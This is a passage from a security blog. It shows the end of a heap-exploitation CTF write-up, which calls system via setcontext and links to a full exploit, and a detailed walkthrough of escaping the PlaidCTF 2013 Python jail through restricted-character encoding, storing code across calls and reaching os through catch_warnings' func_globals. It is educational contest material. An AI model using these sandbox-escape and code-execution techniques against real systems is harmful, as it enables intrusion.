in the same note. The second option is to control <code class="highlighter-rouge">rdi</code> and <code class="highlighter-rouge">ret</code>’s target and
call system with a controlled argument. That sounds way easier to do.</p>
<p>We’re almost there. If we manage to put the address of a payload at <code class="highlighter-rouge">rdi + 0x68</code>
and the address of system at <code class="highlighter-rouge">rdi + 0xa8</code> it’s a win. But that took (me) a long
time, I didn’t really know what I was doing and I had no experience with heap
spraying. Finally the following routine worked out OK:</p>
<ol>
<li>Add a bunch of notes with the address of system</li>
<li>Delete those notes in order to empty the array</li>
<li>Add a bunch of notes with a payload, the array will fill with pointers to it.</li>
</ol>
<p>The payload notes should have a different size than the system ones, otherwise
they will end up overwriting our pointers.</p>
<p><a href="http://2.bp.blogspot.com/-1ZHSGrcDBNM/U2Fpa741amI/AAAAAAAAAHU/9FYwwi9vzgI/s1600/snapshot.png"><img src="http://2.bp.blogspot.com/-1ZHSGrcDBNM/U2Fpa741amI/AAAAAAAAAHU/9FYwwi9vzgI/s1600/snapshot.png" alt="" /></a></p>
<p>Looks good! Now we just have to setup a trampoline in order to be able to call
<code class="highlighter-rouge">setcontext</code>, because we need a pointer to the code in <code class="highlighter-rouge">rax</code> remember? But
that’s easy, we just add a new note, cross our fingers that it doesn’t mess-up
everything. (If it does we can put it somewhere else, libc stdio buffers, a note
that we allocate before all this setting up, etc…) Once we have our note with
the address of <code class="highlighter-rouge">context + 0x57</code> in it, we need to setup note0 with the address
of the trampoline. We can read the address in gdb, setting up note0 is business
as usual, it’s the same as we did for <code class="highlighter-rouge">free</code> and <code class="highlighter-rouge">dump_file</code>.</p>
<p>Once we trigger this we have a shell. Full exploit can be found here:
<a href="http://pastebin.com/0px8FEJ7">http://pastebin.com/0px8FEJ7</a> It works on my
machine, but it depends on libc which means it might require some adjustments
before it does on yours. gl;hf.</p>
<p>Ps: The reason I use bash and not sh for this exploit is that sh crashed on my
laptop when called from this exploit, I have no idea why.</p>wapiflapiLong time no see! I just spent two days exploiting a CTF challenge and people want me to do a writeup so here we go. Full sploit can be found here: http://pastebin.com/0px8FEJ7A python’s escape from PlaidCTF jail2013-04-22T00:00:00+00:002013-04-22T00:00:00+00:00https://wapiflapi.github.io/2013/04/22/plaidctf-pyjail-story-of-pythons-escape<p>Python jails are pretty common among CTF challenges. Often a good knowledge of
the interpreter’s internals gets you a long way. For the non initiated it might
sometimes seem like black magic. PlaidCTF offered a challenging task that
required the combination of some different techniques and logic.</p>
<p>This time there was a service listening on the remote server, with a python
script called for each new connection. We were told we had to get a shell
because we couldn’t guess where the flag was stored. Another important detail
is that the challenge was running on python2.6.6.</p>
<p>The script was given to us and you can find its code
<a href="http://www.pnuts.tk/data/plaid2k13/pyjail/pyjail.py-ae426f39b325ed99123f590c8a8bbe224fefb406">here</a>.</p>
<h1 id="overview">Overview</h1>
<p>Basically it sets up a jail, and then executes user input after some restricting
checks. I shall present the different protections before explaining how we can
bypass most of them, and finally escape from this jail.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">modules</span>
<span class="n">modules</span><span class="o">.</span><span class="n">clear</span><span class="p">()</span>
<span class="k">del</span> <span class="n">modules</span>
</code></pre></div></div>
<p><code class="highlighter-rouge">sys.modules</code> is a dictionary that contains all the modules which where imported
since the interpreter started. Clearing the modules breaks a lot of things. It
breaks a lot of stuff because often a standard function will check if some
module is present. But deleting the modules altogether breaks even more code,
because now the check itself raises an exception!</p>
<p>The next step in setting up the jail’s environment is this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__builtins__</span><span class="o">.</span><span class="n">__dict__</span><span class="o">.</span><span class="n">clear</span><span class="p">()</span>
<span class="n">__builtins__</span> <span class="o">=</span> <span class="bp">None</span>
</code></pre></div></div>
<p>This is pretty self explanatory. It clears the dictionary python uses to find
its builtins and we can’t use them anymore except if we already have a reference
to the builtin we need somewhere else.</p>
<p>There is one protection left, but it doesn’t try to limit what we can do, it
only tries to make it harder by filtering out certain characters and imposing a
length limit. Notice that the script calls <code class="highlighter-rouge">_raw_input</code>, which is just backup it
made of <code class="highlighter-rouge">raw_input</code> before clearing the builtins.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">inp</span> <span class="o">=</span> <span class="n">_raw_input</span><span class="p">()</span>
<span class="n">inp</span> <span class="o">=</span> <span class="n">inp</span><span class="o">.</span><span class="n">split</span><span class="p">()[</span><span class="mi">0</span><span class="p">][:</span><span class="mi">1900</span><span class="p">]</span>
<span class="c1">#Dick move: you also have to only use the characters that my solution did.
</span><span class="n">inp</span> <span class="o">=</span> <span class="n">inp</span><span class="o">.</span><span class="n">translate</span><span class="p">(</span><span class="s">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span><span class="nb">chr</span><span class="p">,</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">256</span><span class="p">))),</span>
<span class="s">'"!#$&*+-/0123456789;=>?ABCDEFGHIJKLMNOPQRSTUVWXYZ</span><span class="se">\\</span><span class="s">^ab</span><span class="err">
</span><span class="s">cdefghijklmnopqrstuvwxyz|'</span><span class="p">)</span>
</code></pre></div></div>
<p>Basically this means our input should be 1900 bytes or less, and should only
contain characters in the <code class="highlighter-rouge">set([':', '%', "'", '</code>’, ‘(‘, ‘,’, ‘)’, ‘}’, ‘{‘,
‘[’, ‘.’, ‘]’, ‘<’, ‘_’, ‘~’])`, the split ensures there can’t be any white-
spaces. It’s important to note that we are also allowed to use most of the non
printable characters if we want to.</p>
<p>After all this we finally get to the interesting part: code execution! We are
lucky because it is in two stages, so we have twice the fun :-)</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">exec</span> <span class="s">'a='</span> <span class="o">+</span> <span class="n">_eval</span><span class="p">(</span><span class="n">inp</span><span class="p">,</span> <span class="p">{})</span> <span class="ow">in</span> <span class="p">{}</span>
</code></pre></div></div>
<p>Don’t be fooled. The eval is not in the exec. It could be written like this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">cmd</span> <span class="o">=</span> <span class="s">'a='</span> <span class="o">+</span> <span class="n">_eval</span><span class="p">(</span><span class="n">inp</span><span class="p">,</span> <span class="p">{})</span>
<span class="k">exec</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="p">{}</span>
</code></pre></div></div>
<p>Quick reminder, in python <code class="highlighter-rouge">eval</code> is used to evaluate an expression and returns
its value whereas <code class="highlighter-rouge">exec</code> is a statement that compiles and executes a set of
statements. In short this means you can execute statements when you are using
<code class="highlighter-rouge">exec</code> but not when using <code class="highlighter-rouge">eval</code>.</p>
<p>The empty dict given to <code class="highlighter-rouge">eval</code> as its second parameter and the <code class="highlighter-rouge">in {}</code> after the
<code class="highlighter-rouge">exec</code> both mean the same thing, that the code should be evaluated in a new
empty scope. So we can’t (in theory) pass stuff from the <code class="highlighter-rouge">eval</code> to the <code class="highlighter-rouge">exec</code>,
or interact with the outer-world in any way.</p>
<p>Most of python are just references, and this we can see here again. These
protections only remove references. The original modules like <code class="highlighter-rouge">os</code>, and the
builtins are not altered in any way. Our task is quiet clear, we need to find a
reference to something useful and use it to find the flag on the file
system. But first we need to find a way of executing code with this little
characters allowed.</p>
<h1 id="running-code">Running code</h1>
<p>How do we get code running with only characters from <code class="highlighter-rouge">set([':', '%', "'", '</code>’,
‘(‘, ‘,’, ‘)’, ‘}’, ‘{‘, ‘[’, ‘.’, ‘]’, ‘<’, ‘_’, ‘~’])`? Answer: It’s python,
python is fun, let’s have some fun.</p>
<p>We have everything we need to build tuples <code class="highlighter-rouge">()</code>, lists <code class="highlighter-rouge">[]</code> and dictionaries
<code class="highlighter-rouge">{:}</code>. If it was python 2.7 we could also make sets using <code class="highlighter-rouge">{}</code> but sadly that
isn’t the case. We can also build strings using <code class="highlighter-rouge">' '</code> and we could use <code class="highlighter-rouge">%</code> to do
some formatting. The comma will obviously help when building tuples or lists,
and the dot might be useful to access attributes.</p>
<p>We haven’t talked about <code class="highlighter-rouge"><</code>, <code class="highlighter-rouge">~</code>, <code class="highlighter-rouge">_</code> and <code class="highlighter-rouge">`</code>, yet. <code class="highlighter-rouge"><</code> and <code class="highlighter-rouge">~</code> are simple
operators, we can do less-than comparison and binary-negation. <code class="highlighter-rouge">_</code> would be a
way to have something valid for a variable identifier, but we do not have <code class="highlighter-rouge">=</code> so
that might not be of much use.</p>
<p>Now, if you are like me and didn’t know <code class="highlighter-rouge">`</code> actually did something in
python2 you might be surprised! As it turns out <code class="highlighter-rouge">`x`</code> is equivalent to
<code class="highlighter-rouge">repr(x)</code>! This means we can produce strings out of objects.</p>
<p>Some of these symbols can be used for multiple purposes, <code class="highlighter-rouge">%</code> can be used for
string formatting but also for integer modulo and <code class="highlighter-rouge"><</code> can be used both for
comparing to integers and in the form of <code class="highlighter-rouge"><<</code> binary-shifting them to the left</p>
<p>We can see that most of the characters we are allowed to use are pretty useful
and I dare say it is easier doing python with only those than it would be
without them!</p>
<p>Remember we have two execution stages, first the <code class="highlighter-rouge">eval</code>, then the <code class="highlighter-rouge">exec</code>. The
<code class="highlighter-rouge">exec</code> executes what the <code class="highlighter-rouge">eval</code> returns. So we should consider the <code class="highlighter-rouge">eval</code> as a
decoder. The 1900 character limit is supposed to force you to think a lot about
this, but we bypassed it (as I will explain later), that is why we didn’t put to
much thought into the encoding scheme.</p>
<p>The first thing to notice is that <code class="highlighter-rouge">[]<[]</code> is <code class="highlighter-rouge">False</code>, which is pretty
logical. What is less explainable but serves us well is the fact that <code class="highlighter-rouge">{}<[]</code>
evaluates to <code class="highlighter-rouge">True</code>.</p>
<p><code class="highlighter-rouge">True</code> and <code class="highlighter-rouge">False</code>, when used in arithmetic operations, behave like <code class="highlighter-rouge">1</code> and
<code class="highlighter-rouge">0</code>. This will be the building block of our decoder but we still need to find a
way to actually produce arbitrary strings.</p>
<h2 id="getting-characters">Getting characters</h2>
<p>Let’s start with a generic solution, we will improve on it later. Getting the
numeric ASCII values of our characters seems doable with <code class="highlighter-rouge">True</code>, <code class="highlighter-rouge">False</code>, <code class="highlighter-rouge">~</code>
and <code class="highlighter-rouge"><<</code>. But we need something like <code class="highlighter-rouge">str()</code> or <code class="highlighter-rouge">"%c"</code>. This is where the
invisible characters come in handy! <code class="highlighter-rouge">"\xcb"</code> for example, it’s not even ascii as
it is larger than 127, but it is valid in a python string, and we can send it to
the server.</p>
<p>If we take its representation using <code class="highlighter-rouge">`'_\xcb_'`</code> (In practice we will send a
byte with the value <code class="highlighter-rouge">0xcb</code> <em>not</em> <code class="highlighter-rouge">'\xcb'</code>), we have a string containing a c. We
also need a <code class="highlighter-rouge">'%'</code>, and we need those two, and those two only.</p>
<p>We want this: <code class="highlighter-rouge">`'%\xcb'`[1::3]</code> , using True and False to build the numbers we
get:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="sb">`'%\xcb'`</span><span class="p">[{}</span><span class="o"><</span><span class="p">[]::</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">({}</span><span class="o"><</span><span class="p">[])</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))]</span>
</code></pre></div></div>
<p>There you go! Now provided we can have any number build using the same trick as
for the indexes we just have to use the above and <code class="highlighter-rouge">%(number)</code> to get any
character we want.</p>
<p>Some optimization is possible for specific characters by finding them in the
representations of True, False and the invisible characters. As I am about to
bypass the length limit I didn’t bother doing this to much.</p>
<h2 id="numbers">Numbers</h2>
<p>This is where I failed during the CTF and what cost me the shame of getting
the flag five minutes after the end. Had I coded something to automate the
process of getting arbitrary numbers I wouldn’t have missed spaces when I
finally got a shell. But more on that later. The point is I shall do it right
now.</p>
<p>If you have ever studied any logic you might have encountered the claim that
everything could be done with NAND gates. NOT-AND. This is remarkably close to
how we shall proceed, except for the fact we shall use multiply-by-two instead
of AND. We won’t use True.</p>
<p>Everything can be done using only <code class="highlighter-rouge">False</code> (0), <code class="highlighter-rouge">~</code> (not), <code class="highlighter-rouge"><<</code> (x2), let me show
you with an example. We shall go from 42 to 0 using <code class="highlighter-rouge">~</code> and <code class="highlighter-rouge">/2</code>, then we can
revert that process using <code class="highlighter-rouge">~</code> and <code class="highlighter-rouge">*2</code>.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">42</span> <span class="c1"># /2
</span> <span class="mi">21</span> <span class="c1"># ~
</span><span class="o">-</span><span class="mi">22</span> <span class="c1"># /2
</span><span class="o">-</span><span class="mi">11</span> <span class="c1"># ~
</span> <span class="mi">10</span> <span class="c1"># /2
</span> <span class="mi">5</span> <span class="c1"># ~
</span> <span class="o">-</span><span class="mi">6</span> <span class="c1"># /2
</span> <span class="o">-</span><span class="mi">3</span> <span class="c1"># ~
</span> <span class="mi">2</span> <span class="c1"># /2
</span> <span class="mi">1</span>
<span class="bp">True</span> <span class="o">=</span> <span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="mi">42</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="o">/</span><span class="mi">2</span>
</code></pre></div></div>
<p>Basically we divided by two when we could, else we inverted all the bits. The
nice property of this is that when inverting we are guaranteed to be able to
divide by two afterward. So that finally we shall hit 1, 0 or -1.</p>
<p>But wait. Didn’t I say we would not use True, 1? Yes I did, but I lied. We will
use it because True is obviously shorter than <code class="highlighter-rouge">~(~False*2)</code>, especially
considering the fact we will use True anyway to do x2, which in our case is of
course <code class="highlighter-rouge"><<({}<[])</code>.</p>
<p>Anyway, the moment we hit 1, 0 or -1 we can just use <code class="highlighter-rouge">True</code>, <code class="highlighter-rouge">False</code> or
<code class="highlighter-rouge">~False</code>.</p>
<p>So now we can reverse this and we have:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">42</span> <span class="o">=</span> <span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="mi">1</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span>
</code></pre></div></div>
<p>Using what we are allowed to:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">42</span> <span class="o">=</span> <span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(({}</span><span class="o"><</span><span class="p">[])</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[])</span>
</code></pre></div></div>
<p>How to not loose a CTF:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">brainfuckize</span><span class="p">(</span><span class="n">nb</span><span class="p">):</span>
<span class="k">if</span> <span class="n">nb</span> <span class="ow">in</span> <span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">]:</span>
<span class="k">return</span> <span class="p">[</span><span class="s">"~({}<[])"</span><span class="p">,</span> <span class="s">"~([]<[])"</span><span class="p">,</span>
<span class="s">"([]<[])"</span><span class="p">,</span> <span class="s">"({}<[])"</span><span class="p">][</span><span class="n">nb</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span>
<span class="k">if</span> <span class="n">nb</span> <span class="o">%</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">return</span> <span class="s">"~</span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">brainfuckize</span><span class="p">(</span><span class="o">~</span><span class="n">nb</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="s">"(</span><span class="si">%</span><span class="s">s<<({}<[]))"</span> <span class="o">%</span> <span class="n">brainfuckize</span><span class="p">(</span><span class="n">nb</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span>
</code></pre></div></div>
<p>I wonder if using % as a modulo might optimize the length of some of these
expressions. If you have any thoughts about this feel free to talk to me about
it!</p>
<h2 id="and-in-the-darkness-bind-them"><em>And in the darkness bind them!</em></h2>
<p>Joining is not trivial, but there is a little trick that makes it quite easy.
If we were building a list of characters the representation of that list would
contain all those characters (obviously), and the best part is they should be
equally spaced. A simple slice should be enough to give us the complete string.</p>
<pre><code class="language-pycon">>>> `['a', 'b', 'c', 'd']`[2::5]
'abcd'
>>> `['a', 'b', 'c', 'd']`[(({}<[])<<({}<[]))::~(~(({}<[])<<({}<[]))<<({}<[]))]
'abcd'
</code></pre>
<p>Since we have the ability to generate arbitrary numbers and single characters
this works well.</p>
<p>However <em>care must be taken</em> because this does not always work. In particular
when the representation of a character is composed of more than one character,
such cases include but are not limited to <code class="highlighter-rouge">\n</code>, <code class="highlighter-rouge">\t</code>, <code class="highlighter-rouge">\\</code>, etc… Luckily those
characters are seldom needed, and we won’t use them.</p>
<p>We can now generate almost all the code we want from the <code class="highlighter-rouge">eval()</code> and it will be
passed to the exec statement!</p>
<p>Before moving on to the next step, let’s enjoy some valid python code!</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="sb">`[`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(((~(~(~(~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((((~(~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~(~(~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((((((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(((~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~((((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~(~((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~(~(~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((((((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~((~(~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~((~((~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((((((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~((((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((~(((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((~(((~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])))]`</span><span class="p">[(({}</span><span class="o"><</span><span class="p">[])</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))::</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(({}</span><span class="o"><</span><span class="p">[])</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))]</span>
</code></pre></div></div>
<h1 id="about-python-scopes">About python scopes</h1>
<p>At this stage, and before trying to exploit anything, I think it might be useful
to give a quick aperçu of how python handles scopes. This won’t explain
everything there is to know about it and I strongly suggest you should read more
about it is your are interested. If, however, you feel perfectly comfortable
with the way python handles and stores this stuff you may safely skip this
section.</p>
<p>There are two kinds of variables that I will talk about, namely <em>global</em> and
<em>local</em> variables. Of course, being python, there is no real difference between
the way a variable referring to a number, a class or a function, is handled.</p>
<h2 id="globals">globals</h2>
<p>What we usually call global variables are not in fact global in the same sense
as global variables in C would be. They are only global relative to the module
in which they are defined. When accessing them from outside there module you
would do for example: <code class="highlighter-rouge">math.pi</code> to access the global variable named <code class="highlighter-rouge">'pi'</code> in
the module <code class="highlighter-rouge">'math'</code>.</p>
<p>All the global variables in a module are stored in the module’s <code class="highlighter-rouge">__dict__</code> which
is an attribute of the module. Modifing this <code class="highlighter-rouge">__dict__</code> has the same effect as
using <code class="highlighter-rouge">setattr</code> on the module.</p>
<p>One can get the current module’s globals doing <code class="highlighter-rouge">sys.modules[__name__].__dict__</code>,
or more simply by calling <code class="highlighter-rouge">globals()</code>.</p>
<h2 id="locals">locals</h2>
<p>Local variables are those defined inside the scope of a function. In a way
similar to global variables, locals are stored in a dictionary that can be
accessed through the <code class="highlighter-rouge">f_locals</code> attribute of the code frame in which the
function is/was running. In the CPython implementation modifying the <code class="highlighter-rouge">f_locals</code>
wont affect the actual locals.</p>
<h2 id="from-the-outside">from the outside</h2>
<p>If we take a look at the code of <code class="highlighter-rouge">math.cos</code> we might expect it to use <code class="highlighter-rouge">math.pi</code>,
but it will probably be simply referenced as <code class="highlighter-rouge">pi</code>. When we call <code class="highlighter-rouge">math.cos</code> from
somewhere outside of math, <code class="highlighter-rouge">pi</code> wont be in the globals of the calling
module. Its interesting to learn how <code class="highlighter-rouge">cos</code> finds the reference on <code class="highlighter-rouge">pi</code>. During
the declaration of the function, a reference to the current globals (those of
the module in which it is declared) is kept in the function’s <code class="highlighter-rouge">func_globals</code>
attribute.</p>
<h1 id="exploiting">Exploiting</h1>
<p>We are now able to run code quiet easily and the character problems are mostly
solved. (We still can’t use some characters but we shall do without them)
However, some limits still remain. No builtins, no access to modules, and a
character limit. Let’s solve that last problem first, that way it won’t bother
us afterwards.</p>
<h2 id="solving-the-length-limit">Solving the length limit</h2>
<p>To achieve this we shall add a third execution stage, the second stage (the
original exec statement), which can be triggered as many times as we want,
will be tasked with building the final payload. For this it will need to store
the query parts somewhere, and concatenate the new parts as they arrive.</p>
<p>We need a place to store stuff where we can comeback in the next exec. Finding
a place where we can comeback is easy.</p>
<p>If you have ever done any kind of python jail-escaping the following should be
familiar to you.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">()</span><span class="o">.</span><span class="n">__class__</span><span class="o">.</span><span class="n">__base__</span><span class="o">.</span><span class="n">__subclasses__</span><span class="p">()</span>
</code></pre></div></div>
<p>This get’s the <code class="highlighter-rouge">tuple</code>’s type’s (<code class="highlighter-rouge">().__class__</code>) parent (<code class="highlighter-rouge">__base__</code>) which is
<code class="highlighter-rouge">object</code>, then lists all its subclasses that python knows of. Somewhere in those
we should be able to find one which we are allowed to call <code class="highlighter-rouge">setattr</code> on. Indeed
we are lucky and find:</p>
<pre><code class="language-pycon">>>> ().__class__.__base__.__subclasses__()[-2]
<class 'codecs.IncrementalDecoder'>
>>> ().__class__.__base__.__subclasses__()[-2].test = "wapiflapi"
>>> print ().__class__.__base__.__subclasses__()[-2].test
wapiflapi
</code></pre>
<p><strong>All the code should work on python 2.6.6, but it is trivial to adapt to other versions.</strong></p>
<p>Neat, we can store stuff in this and come back to it later. That’s all we need
for our second stage, we are ready to receive the parts from eval, concatenate
them into our storage and finally exec the whole payload when we are done.</p>
<h4 id="battle-plan">Battle plan:</h4>
<ul>
<li>Stage 1, original <code class="highlighter-rouge">eval()</code>
<ul>
<li>Decode input and generate the python code</li>
<li><strong>This bypasses the character limit</strong></li>
</ul>
</li>
<li>Stage 2, original <code class="highlighter-rouge">exec</code>
<ul>
<li>Concatenate stage 1’s output</li>
<li>exec when ready</li>
<li><strong>This bypasses the length limit</strong></li>
</ul>
</li>
<li>Stage 3, <code class="highlighter-rouge">exec</code> by stage 2
<ul>
<li>Actual payload, will hopefully get us a shell</li>
<li><strong>This gets out of jail</strong></li>
</ul>
</li>
</ul>
<p>This basically solves the problem at hand (the length limit), the code is
pretty trivial and will be shown later when putting everything together. Let’s
first find-out how to really escape from jail.</p>
<h2 id="getting-out">Getting out</h2>
<p>We want a shell, we want <code class="highlighter-rouge">system</code>, <code class="highlighter-rouge">execv</code>, <code class="highlighter-rouge">fork</code>, <code class="highlighter-rouge">dup</code>, in short we want the
<code class="highlighter-rouge">os</code> module. Where can we find it? We need to look for a module or function that
has a reference on <code class="highlighter-rouge">os</code> or on something that has a reference on something like
that. Here experience plays a big role, and we know from experience that the
warnings module is loaded by default and has a lot of <em>nice</em> references. If we
can get its globals we should be fine.</p>
<p>What we normally try, and it worked for the NDH Prequals is :</p>
<pre><code class="language-pycon">>>> [x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][0]()._module
<module 'warnings' from '/usr/lib/python2.7/warnings.pyc'>
</code></pre>
<p>This gives us the module straightaway, no questions asked. It’s so easy because
<code class="highlighter-rouge">catch_warnings</code> keeps a reference to its module. But it didn’t work this time
because <code class="highlighter-rouge">catch_warnings</code> uses <code class="highlighter-rouge">sys.modules</code> to get that reference, and thus it
fails. (They are <code class="highlighter-rouge">.clear()</code>ed, remember?)</p>
<pre><code class="language-pytb">Traceback (most recent call last):
File "/Python-2.6.6/Lib/warnings.py", line 333, in __init__
self._module = sys.modules['warnings'] if module is None else module
KeyError: 'warnings'
</code></pre>
<p>But we still have a way of getting that reference, we saw that functions kept
a reference to the globals of the modules in which they where defined. We only
have to find a real function in <code class="highlighter-rouge">catch_warnings</code> and we should be good to go.</p>
<p>After some searching we find out <code class="highlighter-rouge">catch_warnings.__repr__</code> is backed by a real
function. <code class="highlighter-rouge">__repr__</code> itself is an ‘instancemethod’ not a function, but it’s
trivial to get the function using <code class="highlighter-rouge">__repr__.im_func</code></p>
<p>Then it’s only a matter of getting <code class="highlighter-rouge">warnings'</code> globals using <code class="highlighter-rouge">func_global</code> which
is a reference to it.</p>
<pre><code class="language-pycon">>>> g_warnings = [x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][0].__repr__.im_func.func_globals
>>> print g_warnings["linecache"].os
<module 'os' from '/Python-2.6.6/Lib/os.pyc'>
</code></pre>
<p><code class="highlighter-rouge">warnings</code> imports <code class="highlighter-rouge">linecache</code> which in turn imports <code class="highlighter-rouge">os</code>. We don’t import
anything and that is why doing things like this doesn’t disturb the broken
mess caused by <code class="highlighter-rouge">sys.modules.clear()</code>.</p>
<h1 id="reunion">Reunion</h1>
<p>Now we know everything. We know how to escape the jail, we know how to have
enough space to do so and we know how to use the characters we want to craft our
code. The only think we miss is putting all this together. And it’s pretty easy.</p>
<p>I’d like to thank PPP for their CTF, I really enjoyed it. Also thank you to all
